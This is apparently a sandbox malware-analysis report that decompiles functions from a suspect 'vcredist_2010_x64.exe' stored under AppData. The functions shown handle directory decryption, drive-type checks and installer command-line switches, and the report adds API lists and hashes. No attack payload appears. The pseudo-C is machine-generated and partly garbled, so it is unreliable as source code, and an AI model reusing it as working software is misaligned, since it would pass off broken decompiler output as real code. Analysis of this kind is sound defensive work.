Opcode ID: 39bd5e7e546647ab028321304c63e802246d0dfb69878f62c748718f95d36311
Instruction ID: 50115026e131d678ab12094c5f900f2c20abbbbf56de831dd1116dd559b86531
Opcode Fuzzy Hash: 39bd5e7e546647ab028321304c63e802246d0dfb69878f62c748718f95d36311
Instruction Fuzzy Hash: 23315431600245AFEB17DBA8DC59BAF7BE9FB58740F044069FA81EB2C1DAB59904C760

Uniqueness

Uniqueness Score: -1.00%

Function 010045EB Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 72
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E010045EB(void* __edi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v268;
				void* __ebx;
				void* __esi;
				intOrPtr _t19;
				void* _t20;
				char* _t24;
				void* _t26;
				void* _t27;
				signed char _t30;
				struct HINSTANCE__* _t31;
				_Unknown_base(*)()* _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				signed int _t40;
				signed int _t41;
				void _t48;
				void* _t58;
				void* _t59;
				void* _t60;

				_t19 =  *0x100c028; // 0xb636
				_t37 = _a8;
				_t58 = _a4;
				_v8 = _t19;
				_t20 = _t58;
				_t39 = _t20 + 1;
				do {
					_t48 =  *_t20;
					_t20 = _t20 + 1;
				} while (_t48 != 0);
				_t40 = _t20 - _t39 + 1;
				_t49 = _t40;
				_t41 = _t40 >> 2;
				memcpy( &_v268, _t58, _t41 << 2);
				_t24 = _t60 + memcpy(_t58 + _t41 + _t41, _t58, _t40 & 0x00000003) - 0x108;
				if( *((char*)(_t24 - 1)) != 0x5c) {
					 *_t24 = 0x5c;
					 *((char*)(_t24 + 1)) = 0;
				}
				_t26 = E01004590( &_v268, _t37, _a12); // executed
				_pop(_t59);
				_pop(_t38);
				if(_t26 == 0) {
					L12:
					_t27 = 0;
					L13:
					return E010062FF(_t27, _t38, _v8, _t49, _t59);
				}
				_t30 = GetFileAttributesA( &_v268); // executed
				if(_t30 == 0xffffffff || (_t30 & 0x00000010) == 0) {
					goto L12;
				} else {
					_t31 = LoadLibraryA("advapi32.dll");
					if(_t31 != 0) {
						_t33 = GetProcAddress(_t31, "DecryptFileA");
						if(_t33 != 0) {
							_t34 =  *_t33( &_v268, 0); // executed
							if(_t34 == 0) {
								GetLastError();
							}
						}
					}
					_t27 = 1;
					goto L13;
				}
			}

0x010045f6
0x010045fc
0x01004600
0x01004603
0x01004606
0x01004608
0x0100460b
0x0100460b
0x0100460d
0x0100460e
0x01004614
0x01004617
0x0100461a
0x01004623
0x0100462c
0x01004638
0x0100463a
0x0100463d
0x0100463d
0x0100464c
0x01004653
0x01004654
0x01004655
0x010046a6
0x010046a6
0x010046a8
0x010046b1
0x010046b1
0x0100465e
0x01004667
0x00000000
0x0100466d
0x01004672
0x0100467a
0x01004682
0x0100468a
0x01004695
0x01004699
0x0100469b
0x0100469b
0x01004699
0x0100468a
0x010046a3
0x00000000
0x010046a3

APIs

GetFileAttributesA.KERNELBASE(?), ref: 0100465E
LoadLibraryA.KERNEL32(advapi32.dll), ref: 01004672
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01004682
DecryptFileA.ADVAPI32(?,00000000), ref: 01004695
GetLastError.KERNEL32 ref: 0100469B

Strings

DecryptFileA, xrefs: 0100467C
advapi32.dll, xrefs: 0100466D

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: File$AddressAttributesDecryptErrorLastLibraryLoadProc
String ID: DecryptFileA$advapi32.dll
API String ID: 82924815-2381948369
Opcode ID: 2afcba44abed0f4631d6c18061f481163f3b24b8efbb4aba021dffaed5c2241f
Instruction ID: dd98f6a6a96e0f5451efa8104c5849e027a4f17fe98ce00ff4f40b46ec6d0873
Opcode Fuzzy Hash: 2afcba44abed0f4631d6c18061f481163f3b24b8efbb4aba021dffaed5c2241f
Instruction Fuzzy Hash: 4521D131604605DEFB62DB68CC4CBDA7BE9AB59300F0401A4EAC5E71C1EB75DA54CB16

Uniqueness

Uniqueness Score: -1.00%

Function 01002B13 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E01002B13(void* __edi, void* _a4) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				long _v24;
				intOrPtr _v40;
				void _v48;
				void* __ebx;
				void* __esi;
				intOrPtr _t13;
				int _t15;
				int _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				int _t33;
				char* _t34;

				_t13 =  *0x100c028; // 0xb636
				_t28 = _a4;
				_t34 = "\\\\.\\?:";
				asm("movsd");
				asm("movsw");
				_v8 = _t13;
				_v20 = 0x5c3a3f;
				asm("movsb");
				_v20 = _t28;
				_t15 = GetDriveTypeA( &_v20); // executed
				_t33 = _t15;
				_t17 = _t15;
				if(_t17 == 0) {
					_t34 = 0;
					_v12 = _t28;
					_t28 = CreateFileA( &_v16, 0x80000000, 3, 0, 3, 0, 0);
					if(_t28 == 0xffffffff) {
						goto L3;
					} else {
						if(DeviceIoControl(_t28, 0x70000, 0, 0,  &_v48, 0x18,  &_v24, 0) == 0 || _v40 != 0xb) {
							_t33 = 0;
						}
						CloseHandle(_t28);
					}
				} else {
					_t26 = _t17 - 1;
					if(_t26 != 0) {
						if(_t26 == 3) {
							_t33 = 3;
						} else {
							L3:
							_t33 = 0;
						}
					}
				}
				return E010062FF(_t33, _t28, _v8, _t30, _t34);
			}

0x01002b1b
0x01002b21
0x01002b26
0x01002b2e
0x01002b2f
0x01002b31
0x01002b37
0x01002b3f
0x01002b40
0x01002b43
0x01002b49
0x01002b4c
0x01002b4d
0x01002b60
0x01002b72
0x01002b7b
0x01002b80
0x00000000
0x01002b82
0x01002b9d
0x01002ba5
0x01002ba5
0x01002ba8
0x01002ba8
0x01002b4f
0x01002b4f
0x01002b50
0x01002b55
0x01002b5d
0x01002b57
0x01002b57
0x01002b57
0x01002b57
0x01002b55
0x01002b50
0x01002bbc

APIs

GetDriveTypeA.KERNELBASE(?), ref: 01002B43
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 01002B75
DeviceIoControl.KERNEL32 ref: 01002B95
CloseHandle.KERNEL32(00000000), ref: 01002BA8

Strings

?:\, xrefs: 01002B37
\\.\?:, xrefs: 01002B26

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: CloseControlCreateDeviceDriveFileHandleType
String ID: ?:\$\\.\?:
API String ID: 3103408351-3307214488
Opcode ID: 2c8683e07499ac882b6ccafdf590b753cf23b2020a389af79e37c9552ac3cdc0
Instruction ID: 96b825b74241d8912b1bf084e53a85c8b322490675edc855e8f29042fc933e05
Opcode Fuzzy Hash: 2c8683e07499ac882b6ccafdf590b753cf23b2020a389af79e37c9552ac3cdc0
Instruction Fuzzy Hash: DE119332901618BAE722DBA99C4CEEFBFADEB49360F144161F695F3180DA748645C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 0100400D Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 381
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E0100400D() {
				signed int _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				void* __edi;
				CHAR* _t65;
				char* _t67;
				char _t71;
				intOrPtr* _t72;
				signed int _t74;
				signed int* _t75;
				signed int _t76;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t88;
				signed int _t90;
				intOrPtr _t91;
				void* _t96;
				signed char _t97;
				void* _t99;
				char* _t100;
				char* _t101;
				signed int _t102;
				signed int _t104;
				char* _t106;
				signed int _t107;
				signed int _t109;
				void* _t110;
				signed int* _t111;
				signed int _t113;
				signed int _t115;
				int _t118;
				signed int _t120;
				signed int _t121;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				unsigned int _t135;
				signed int _t136;
				int _t139;
				signed int _t142;
				char _t145;
				void* _t146;
				signed int _t147;
				signed int _t148;
				void* _t149;
				void* _t150;
				signed int _t156;
				void* _t159;
				signed int _t165;
				signed int _t166;
				void* _t172;
				signed int* _t178;
				void* _t179;
				void* _t180;
				char* _t181;
				signed int* _t182;
				void* _t183;
				signed int* _t185;
				void* _t186;

				GetModuleFileNameA(0, 0x100cf40, 0x104);
				_t65 = 0x100cf40;
				do {
					_t145 =  *_t65;
					_t65 =  &(_t65[1]);
				} while (_t145 != 0);
				_t67 = _t65 - 0x100cf41 + 0x100cf40;
				while(_t67 > 0x100cf40) {
					_t106 = _t67 - 1;
					__eflags =  *_t106 - 0x5c;
					if( *_t106 != 0x5c) {
						_t67 = _t106;
						continue;
					}
					break;
				}
				 *0x100c4b0 = E01003E3A(_t67); // executed
				E01003016(_t145, _t159, 0x100cf40); // executed
				_t101 = GetCommandLineA();
				_v24 = _t101;
				_t107 = 0;
				while(1) {
					_t71 =  *_t101;
					if(_t71 != 0x20 && _t71 != 9 && _t71 != 0x22) {
						break;
					}
					if(_t71 == 0x22) {
						_t107 = 1;
					}
					_t101 = _t101 + 1;
				}
				__eflags = _t107;
				_v24 = _t101;
				if(_t107 != 0) {
					__eflags =  *_t101;
					_t100 = _t101;
					if( *_t101 != 0) {
						while(1) {
							__eflags =  *_t100 - 0x22;
							if( *_t100 == 0x22) {
								break;
							}
							_t100 = _t100 + 1;
							__eflags =  *_t100;
							if( *_t100 != 0) {
								continue;
							} else {
							}
							goto L19;
						}
						 *_t100 = 0x20;
					}
				}
				L19:
				_t72 = _t101;
				_t6 = _t72 + 1; // 0x1
				_t146 = _t6;
				do {
					_t109 =  *_t72;
					_t72 = _t72 + 1;
					__eflags = _t109;
				} while (_t109 != 0);
				_t74 = _t72 - _t146 + _t101 - 1;
				while(1) {
					__eflags = _t74 - _t101;
					if(_t74 < _t101) {
						break;
					}
					_t110 =  *_t74;
					__eflags = _t110 - 0x20;
					if(_t110 == 0x20) {
						L24:
						 *_t74 = 0;
						_t74 = _t74 - 1;
						__eflags = _t74;
						continue;
					} else {
						__eflags = _t110 - 9;
						if(_t110 == 9) {
							goto L24;
						}
					}
					break;
				}
				_t75 =  *0x100c4b0; // 0x457810
				_t9 =  &_v8;
				 *_t9 = _v8 & 0x00000000;
				__eflags =  *_t9;
				_t111 = _t75;
				 *0x100d1a0 = 0;
				_t11 =  &(_t111[0]); // 0x457811
				_t178 = _t11;
				do {
					_t147 =  *_t111;
					_t111 =  &(_t111[0]);
					__eflags = _t147;
				} while (_t147 != 0);
				_t13 = _t75 - 1; // 0x457810
				_t148 = _t111 - _t178 + _t13;
				while(1) {
					__eflags = _t148 - _t75;
					if(_t148 <= _t75) {
						break;
					}
					__eflags =  *_t148 - 0x2e;
					if( *_t148 == 0x2e) {
						_t76 = _t148;
						_t14 = _t76 + 1; // 0x457811
						_t179 = _t14;
						do {
							_t113 =  *_t76;
							_t76 = _t76 + 1;
							__eflags = _t113;
						} while (_t113 != 0);
						_t15 = _t76 - _t179 + 1; // 0x457812
						_v8 = _t76 - _t179;
						_t115 = _t15 >> 2;
						_t180 = _t148;
						_t118 = memcpy(0x100d1a0, _t180, _t115 << 2) & 0x00000003;
						__eflags = _t118;
						memcpy(_t180 + _t115 + _t115, _t180, _t118);
						_t186 = _t186 + 0x18;
						 *_t148 = 0;
						_t75 =  *0x100c4b0; // 0x457810
					} else {
						_t148 = _t148 - 1;
						__eflags = _t148;
						continue;
					}
					L36:
					 *0x100c4a8 = L"";
					__eflags =  *_t101;
					_v12 = _t101;
					if( *_t101 != 0) {
						do {
							__eflags = ( *_v12 | 0x00000020) - ( *_t75 | 0x00000020);
							if(( *_v12 | 0x00000020) != ( *_t75 | 0x00000020)) {
								goto L56;
							} else {
								_t104 =  &(_v12[0]);
								_t21 =  &(_t75[0]); // 0x457811
								_t182 = _t21;
								while(1) {
									__eflags = ( *_t182 | 0x00000020) - ( *_t104 | 0x00000020);
									if(( *_t182 | 0x00000020) != ( *_t104 | 0x00000020)) {
										break;
									}
									__eflags =  *_t182;
									if( *_t182 == 0) {
										L43:
										_t166 = 0;
										__eflags =  *_t104 - 0x2e;
										_v20 = 0;
										if( *_t104 == 0x2e) {
											__eflags = _v8;
											if(_v8 > 0) {
												_v16 = _t104;
												_t25 =  &_v16;
												 *_t25 = _v16 - 0x100d1a0;
												__eflags =  *_t25;
												_v20 = 1;
												while(1) {
													_t142 = _v16;
													_t29 = _t166 + 0x100d1a0; // 0x100d1a0
													_t185 = _t29;
													__eflags = ( *(_t185 + _t142) | 0x00000020) - ( *_t185 | 0x00000020);
													if(( *(_t185 + _t142) | 0x00000020) != ( *_t185 | 0x00000020)) {
														break;
													}
													_t166 = _t166 + 1;
													__eflags = _t166 - _v8;
													if(_t166 < _v8) {
														continue;
													} else {
														_t104 = _t104 + _v8;
														__eflags = _t104;
													}
													goto L49;
												}
												_v20 = _v20 & 0x00000000;
											}
										}
										L49:
										_t128 =  *_t104;
										__eflags = _t128 - 0x20;
										if(_t128 == 0x20) {
											L52:
											_t183 = _v24;
											_t129 = _t104 - _t183;
											_t130 = _t129 >> 2;
											memcpy(0x100cbe0, _t183, _t130 << 2);
											__eflags = _v20;
											_t96 = memcpy(_t183 + _t130 + _t130, _t183, _t129 & 0x00000003);
											_t186 = _t186 + 0x18;
											_t172 = _t96 + 0x100cbe0;
											 *_t172 = 0;
											if(__eflags == 0) {
												_t135 = _v8;
												_t156 = _t135;
												_t136 = _t135 >> 2;
												memcpy(_t172, 0x100d1a0, _t136 << 2);
												_t139 = _t156 & 0x00000003;
												__eflags = _t139;
												_t99 = memcpy(0x100d1a0 + _t136 + _t136, 0x100d1a0, _t139);
												_t186 = _t186 + 0x18;
												 *((char*)(_t99 + 0x100cbe0 + _t156)) = 0;
											}
											_t97 = GetFileAttributesA("C:\Users\jones\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe"); // executed
											__eflags = _t97 & 0x00000010;
											if((_t97 & 0x00000010) == 0) {
												 *0x100c4a8 = _t104;
											} else {
												_t75 =  *0x100c4b0; // 0x457810
												goto L56;
											}
										} else {
											__eflags = _t128 - 9;
											if(_t128 == 9) {
												goto L52;
											} else {
												__eflags = _t128;
												if(_t128 != 0) {
													goto L56;
												} else {
													goto L52;
												}
											}
										}
									} else {
										_t104 = _t104 + 1;
										_t182 =  &(_t182[0]);
										__eflags = _t182;
										continue;
									}
									goto L60;
								}
								__eflags =  *_t182;
								if( *_t182 != 0) {
									goto L56;
								} else {
									goto L43;
								}
							}
							goto L60;
							L56:
							_v12 =  &(_v12[0]);
							__eflags =  *_v12;
						} while ( *_v12 != 0);
					}
					L60:
					_t165 =  *0x100c4a8; // 0x443437
					_t81 = _t165;
					_t48 = _t81 + 1; // 0x443438
					_t149 = _t48;
					do {
						_t120 =  *_t81;
						_t81 = _t81 + 1;
						__eflags = _t120;
					} while (_t120 != 0);
					_t82 = _t81 - _t149;
					__eflags = _t82 - 3;
					if(_t82 >= 3) {
						_t82 = _t82 + 0xfffffffe;
						__eflags = _t82;
						_v20 = _t82;
						if(_t82 != 0) {
							do {
								__eflags =  *_t165 - 0x20;
								if( *_t165 == 0x20) {
									_t50 = _t165 + 4; // 0x44343b
									_t102 = _t50;
									_t82 =  *((intOrPtr*)(_t102 - 3));
									__eflags = _t82 - 0x2d;
									if(_t82 == 0x2d) {
										L67:
										_t83 = _t165;
										_t52 = _t83 + 1; // 0x443438
										_t150 = _t52;
										do {
											_t121 =  *_t83;
											_t83 = _t83 + 1;
											__eflags = _t121;
										} while (_t121 != 0);
										_t82 = _t83 - _t150;
										__eflags = _t82 - 2;
										if(_t82 > 2) {
											_t53 = _t165 + 2; // 0x443439
											_t181 = _t53;
											_t84 =  *_t181;
											__eflags = _t84 - 0x65;
											if(__eflags > 0) {
												_t82 = _t84 - 0x69;
												goto L74;
											} else {
												if(__eflags == 0) {
													L88:
													__imp___strnicmp(_t181, "extract:", 8);
													_t186 = _t186 + 0xc;
													__eflags = _t84;
													if(_t84 != 0) {
														goto L92;
													} else {
														__eflags = _t102;
														goto L90;
													}
												} else {
													_t84 = _t84 - 0x45;
													__eflags = _t84;
													if(_t84 == 0) {
														goto L88;
													} else {
														_t82 = _t84 - 4;
														__eflags = _t82;
														L74:
														if(__eflags == 0) {
															__imp___strnicmp(_t181, "integrate", 9);
															_t186 = _t186 + 0xc;
															__eflags = _t82;
															goto L117;
														} else {
															_t82 = _t82 - 7;
															__eflags = _t82;
															if(_t82 == 0) {
																__imp___strnicmp(_t181, "passive", 7);
																_t186 = _t186 + 0xc;
																__eflags = _t82;
																if(_t82 == 0) {
																	_t82 =  *((intOrPtr*)(_t165 + 9));
																	goto L113;
																}
															} else {
																_t85 = _t82 - 1;
																__eflags = _t85;
																if(_t85 == 0) {
																	__imp___strnicmp(_t181, "quiet", 5);
																	_t186 = _t186 + 0xc;
																	__eflags = _t85;
																	if(_t85 != 0) {
																		_t82 =  *((intOrPtr*)(_t165 + 3));
																	} else {
																		_t82 =  *((intOrPtr*)(_t102 + 3));
																	}
																	__eflags = _t82 - 0x20;
																	if(_t82 == 0x20) {
																		L109:
																		_t82 = 1;
																		 *0x100c4b4 = 1;
																		 *0x101d3e0 = 1;
																	} else {
																		__eflags = _t82;
																		if(_t82 == 0) {
																			goto L109;
																		}
																	}
																} else {
																	_t88 = _t85;
																	__eflags = _t88;
																	if(_t88 == 0) {
																		_t82 =  *((intOrPtr*)(_t165 + 3));
																		__eflags = _t82 - 0x3a;
																		if(_t82 == 0x3a) {
																			L118:
																			 *0x100ce08 = 1;
																		} else {
																			__eflags = _t82 - 0x20;
																			if(_t82 == 0x20) {
																				goto L118;
																			} else {
																				__eflags = _t82;
																				L117:
																				if(__eflags == 0) {
																					goto L118;
																				}
																			}
																		}
																	} else {
																		_t90 = _t88;
																		__eflags = _t90;
																		if(_t90 == 0) {
																			_t82 =  *((intOrPtr*)(_t165 + 3));
																			L113:
																			__eflags = _t82 - 0x20;
																			if(_t82 == 0x20) {
																				L115:
																				 *0x101d3e0 = 1;
																			} else {
																				__eflags = _t82;
																				if(_t82 == 0) {
																					goto L115;
																				}
																			}
																		} else {
																			_t82 = _t90 - 3;
																			__eflags = _t82;
																			if(_t82 == 0) {
																				_t91 =  *((intOrPtr*)(_t165 + 3));
																				__eflags = _t91 - 0x3a;
																				if(_t91 == 0x3a) {
																					L90:
																					 *0x100c4ac = 1;
																					_t82 = E01002F3A(_t102);
																					__eflags = _t82;
																					if(_t82 == 0) {
																						E01003892(0x52);
																						L92:
																						__imp___strnicmp(_t181, "extract", 7);
																						_t186 = _t186 + 0xc;
																						__eflags = _t82;
																						if(_t82 == 0) {
																							_t82 =  *((intOrPtr*)(_t165 + 9));
																							goto L85;
																						}
																					}
																				} else {
																					__eflags = _t91 - 0x50;
																					if(_t91 == 0x50) {
																						L98:
																						_t82 =  *_t102;
																						__eflags = _t82 - 0x20;
																						if(_t82 == 0x20) {
																							L100:
																							_t82 = 1;
																							 *0x100c4ac = 1;
																							 *0x100c054 = 1;
																						} else {
																							__eflags = _t82;
																							if(_t82 == 0) {
																								goto L100;
																							}
																						}
																					} else {
																						__eflags = _t91 - 0x58;
																						if(_t91 == 0x58) {
																							L95:
																							_t82 =  *_t102;
																							__eflags = _t82 - 0x20;
																							if(_t82 == 0x20) {
																								L97:
																								 *0x100c000 =  *0x100c000 & 0x00000000;
																								 *0x100c4ac = 1;
																							} else {
																								__eflags = _t82;
																								if(_t82 == 0) {
																									goto L97;
																								}
																							}
																						} else {
																							__eflags = _t91 - 0x70;
																							if(_t91 == 0x70) {
																								goto L98;
																							} else {
																								__eflags = _t91 - 0x78;
																								if(_t91 == 0x78) {
																									goto L95;
																								} else {
																									L85:
																									__eflags = _t82 - 0x20;
																									if(_t82 == 0x20) {
																										L87:
																										 *0x100c4ac = 1;
																									} else {
																										__eflags = _t82;
																										if(_t82 == 0) {
																											goto L87;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										__eflags = _t82 - 0x2f;
										if(_t82 == 0x2f) {
											goto L67;
										}
									}
								}
								_v20 = _v20 - 1;
								_t165 = _t165 + 1;
								__eflags = _v20;
							} while (_v20 > 0);
						}
					}
					return _t82;
				}
				goto L36;
			}

0x01004025
0x0100402b
0x01004030
0x01004030
0x01004032
0x01004033
0x01004039
0x0100404b
0x01004041
0x01004044
0x01004047
0x01004049
0x00000000
0x01004049
0x00000000
0x01004047
0x01004056
0x0100405b
0x01004066
0x01004068
0x0100406b
0x0100406d
0x0100406d
0x01004071
0x00000000
0x00000000
0x0100407d
0x01004081
0x01004081
0x01004082
0x01004082
0x01004085
0x01004087
0x0100408a
0x0100408c
0x0100408f
0x01004091
0x01004093
0x01004093
0x01004096
0x00000000
0x00000000
0x01004098
0x01004099
0x0100409c
0x00000000
0x00000000
0x0100409e
0x00000000
0x0100409c
0x010040a0
0x010040a0
0x01004091
0x010040a3
0x010040a3
0x010040a5
0x010040a5
0x010040a8
0x010040a8
0x010040aa
0x010040ab
0x010040ab
0x010040b1
0x010040c7
0x010040c7
0x010040c9
0x00000000
0x00000000
0x010040b7
0x010040b9
0x010040bc
0x010040c3
0x010040c3
0x010040c6
0x010040c6
0x00000000
0x010040be
0x010040be
0x010040c1
0x00000000
0x00000000
0x010040c1
0x00000000
0x010040bc
0x010040cb
0x010040d0
0x010040d0
0x010040d0
0x010040d4
0x010040d6
0x010040dd
0x010040dd
0x010040e0
0x010040e0
0x010040e2
0x010040e3
0x010040e3
0x010040e9
0x010040e9
0x010040f5
0x010040f5
0x010040f7
0x00000000
0x00000000
0x010040ef
0x010040f2
0x010040fb
0x010040fd
0x010040fd
0x01004100
0x01004100
0x01004102
0x01004103
0x01004103
0x01004109
0x0100410c
0x01004111
0x01004114
0x0100411f
0x0100411f
0x01004122
0x01004122
0x01004124
0x01004127
0x010040f4
0x010040f4
0x010040f4
0x00000000
0x010040f4
0x0100412c
0x0100412c
0x01004136
0x01004139
0x0100413c
0x01004142
0x0100414f
0x01004151
0x00000000
0x01004157
0x0100415a
0x0100415b
0x0100415b
0x01004167
0x01004171
0x01004173
0x00000000
0x00000000
0x01004160
0x01004163
0x0100417e
0x0100417e
0x01004180
0x01004183
0x01004186
0x01004188
0x0100418b
0x0100418d
0x01004190
0x01004190
0x01004190
0x01004197
0x0100419e
0x0100419e
0x010041a1
0x010041a1
0x010041b2
0x010041b4
0x00000000
0x00000000
0x010041ba
0x010041bb
0x010041be
0x00000000
0x010041c0
0x010041c0
0x010041c0
0x010041c0
0x00000000
0x010041be
0x01004243
0x01004243
0x0100418b
0x010041c3
0x010041c3
0x010041c5
0x010041c8
0x010041d3
0x010041d3
0x010041da
0x010041de
0x010041e6
0x010041ed
0x010041f1
0x010041f1
0x010041f3
0x010041f9
0x010041fc
0x010041fe
0x01004201
0x01004203
0x0100420b
0x0100420f
0x0100420f
0x01004212
0x01004212
0x01004216
0x01004216
0x01004223
0x01004229
0x0100422b
0x0100424c
0x0100422d
0x0100422d
0x00000000
0x0100422d
0x010041ca
0x010041ca
0x010041cd
0x00000000
0x010041cf
0x010041cf
0x010041d1
0x00000000
0x00000000
0x00000000
0x00000000
0x010041d1
0x010041cd
0x01004165
0x01004165
0x01004166
0x01004166
0x00000000
0x01004166
0x00000000
0x01004163
0x01004175
0x01004178
0x00000000
0x00000000
0x00000000
0x00000000
0x01004178
0x00000000
0x01004232
0x01004232
0x01004238
0x01004238
0x01004241
0x01004252
0x01004252
0x01004258
0x0100425a
0x0100425a
0x0100425d
0x0100425d
0x0100425f
0x01004260
0x01004260
0x01004264
0x01004266
0x01004269
0x0100426f
0x0100426f
0x01004272
0x01004275
0x0100427b
0x0100427b
0x0100427e
0x01004284
0x01004284
0x01004287
0x0100428a
0x0100428c
0x01004296
0x01004296
0x01004298
0x01004298
0x0100429b
0x0100429b
0x0100429d
0x0100429e
0x0100429e
0x010042a2
0x010042a4
0x010042a7
0x010042ad
0x010042ad
0x010042b0
0x010042b3
0x010042b6
0x01004388
0x00000000
0x010042bc
0x010042bc
0x01004333
0x0100433b
0x01004341
0x01004344
0x01004346
0x00000000
0x01004348
0x01004348
0x00000000
0x01004348
0x010042be
0x010042be
0x010042be
0x010042c1
0x00000000
0x010042c3
0x010042c3
0x010042c3
0x010042c6
0x010042c6
0x01004450
0x01004456
0x01004459
0x00000000
0x010042cc
0x010042cc
0x010042cc
0x010042cf
0x01004424
0x0100442a
0x0100442d
0x0100442f
0x01004431
0x00000000
0x01004431
0x010042d5
0x010042d5
0x010042d5
0x010042d6
0x010043f0
0x010043f6
0x010043f9
0x010043fb
0x01004417
0x010043fd
0x010043fd
0x010043fd
0x01004400
0x01004402
0x01004408
0x0100440a
0x0100440b
0x01004410
0x01004404
0x01004404
0x01004406
0x00000000
0x00000000
0x01004406
0x010042dc
0x010042dd
0x010042dd
0x010042de
0x010043d9
0x010043dc
0x010043de
0x0100445d
0x0100445d
0x010043e0
0x010043e0
0x010043e2
0x00000000
0x010043e4
0x010043e4
0x0100445b
0x0100445b
0x00000000
0x00000000
0x0100445b
0x010043e2
0x010042e4
0x010042e5
0x010042e5
0x010042e6
0x010043d4
0x01004434
0x01004434
0x01004436
0x0100443c
0x0100443c
0x01004438
0x01004438
0x0100443a
0x00000000
0x00000000
0x0100443a
0x010042ec
0x010042ec
0x010042ec
0x010042ef
0x010042f5
0x010042f8
0x010042fa
0x0100434b
0x0100434c
0x01004356
0x0100435b
0x0100435d
0x01004365
0x0100436a
0x01004372
0x01004378
0x0100437b
0x0100437d
0x01004383
0x00000000
0x01004383
0x0100437d
0x010042fc
0x010042fc
0x010042fe
0x010043b4
0x010043b4
0x010043b6
0x010043b8
0x010043c2
0x010043c4
0x010043c5
0x010043ca
0x010043ba
0x010043ba
0x010043bc
0x00000000
0x00000000
0x010043bc
0x01004304
0x01004304
0x01004306
0x01004390
0x01004390
0x01004392
0x01004394
0x0100439e
0x0100439e
0x010043a5
0x01004396
0x01004396
0x01004398
0x00000000
0x00000000
0x01004398
0x0100430c
0x0100430c
0x0100430e
0x00000000
0x01004314
0x01004314
0x01004316
0x00000000
0x01004318
0x01004318
0x01004318
0x0100431a
0x01004324
0x01004324
0x0100431c
0x0100431c
0x0100431e
0x00000000
0x00000000
0x0100431e
0x0100431a
0x01004316
0x0100430e
0x01004306
0x010042fe
0x010042fa
0x010042ef
0x010042e6
0x010042de
0x010042d6
0x010042cf
0x010042c6
0x010042c1
0x010042bc
0x010042b6
0x0100428e
0x0100428e
0x01004290
0x00000000
0x00000000
0x01004290
0x0100428c
0x01004467
0x0100446a
0x0100446b
0x0100446b
0x0100427b
0x01004275
0x01004479
0x01004479
0x00000000

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe,00000104), ref: 01004025
GetCommandLineA.KERNEL32 ref: 01004060
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe), ref: 01004223
_strnicmp.MSVCRT ref: 0100433B
_strnicmp.MSVCRT ref: 01004372
_strnicmp.MSVCRT ref: 01004450

Strings

74D, xrefs: 0100424C, 01004252
integrate, xrefs: 0100444A
quiet, xrefs: 010043EA
.exe, xrefs: 010040D6, 01004116, 01004190, 01004206
C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe, xrefs: 0100401D, 01004022, 01004055
C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe, xrefs: 010041E1, 0100421E
passive, xrefs: 0100441E
extract, xrefs: 0100436C
extract:, xrefs: 01004335

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: _strnicmp$File$AttributesCommandLineModuleName
String ID: .exe$74D$C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe$extract$extract:$integrate$passive$quiet
API String ID: 3875041768-1628360767
Opcode ID: ac494798e5bc9b3b8e97eb29fcbcefb1249f91a18fa69446e7f113a224a58319
